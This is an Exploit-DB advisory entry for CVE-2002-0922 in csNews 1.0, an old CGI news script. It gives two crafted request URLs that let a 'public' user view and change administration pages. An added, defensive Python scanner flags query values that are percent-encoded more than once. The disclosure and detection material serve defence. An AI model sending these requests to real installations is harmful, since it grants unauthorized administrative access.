CGIScript.net csNews 1.0 Double URL Encoding Unauthorized Administrative Access

2002-06-11T00:00:00
ID EDB-ID:21532
Type exploitdb
Reporter Steve Gustin
Modified 2002-06-11T00:00:00

Description

CGIScript.net csNews 1.0 Double URL Encoding Unauthorized Administrative Access. CVE-2002-0922. Webapps exploit for the cgi platform.

                                        
source: http://www.securityfocus.com/bid/4993/info

csNews is a script for managing news items on a website. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems.

Users with "public" access to the system may be able to view and modify some administration pages. This is accomplished by submitting an HTTP request in which some metacharacters are double URL-encoded.


CSNews.cgi?database=default%2edb&command=showadv&mpage=manager
CSNews.cgi?command=manage&database=default%2edb&mpage=manager
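
For defenders reviewing web server logs, the following added example (not part of the original advisory, and not csNews code) flags query parameters that need more than one round of percent-decoding to reach their canonical form, which is the double URL encoding condition described above. The script path, parameter names and sample requests are constructed for illustration.

```python
from urllib.parse import unquote, urlsplit

MAX_ROUNDS = 5  # cap so hostile input cannot force unbounded decoding


def decode_rounds(raw):
    """Percent-decode until the value stops changing; return (canonical, rounds)."""
    current, rounds = raw, 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current, rounds


def flag_multi_encoded(url):
    """Return {param: canonical_value} for query parameters encoded more than once."""
    flagged = {}
    for pair in urlsplit(url).query.split("&"):
        if not pair:
            continue
        name, _, raw_value = pair.partition("=")
        canonical, rounds = decode_rounds(raw_value)
        if rounds > 1:  # one round is ordinary URL encoding; two or more is suspicious
            flagged[name] = canonical
    return flagged


# Constructed sample requests (hypothetical script and parameter names).
SAMPLE_REQUESTS = [
    "/cgi-bin/example.cgi?db=archive.db&page=1",      # not encoded
    "/cgi-bin/example.cgi?db=archive%2edb&page=1",    # encoded once: normal
    "/cgi-bin/example.cgi?db=archive%252edb&page=1",  # encoded twice: flagged
]


def scan(requests):
    """Return (request, flagged_params) for every request with a multi-encoded value."""
    results = [(r, flag_multi_encoded(r)) for r in requests]
    return [(r, params) for r, params in results if params]


if __name__ == "__main__":
    for request, params in scan(SAMPLE_REQUESTS):
        print(request, "->", params)
```

The same canonicalize-then-check order applies inside an application: access decisions should be made on the fully decoded value, so a later decoding step cannot change what was authorized.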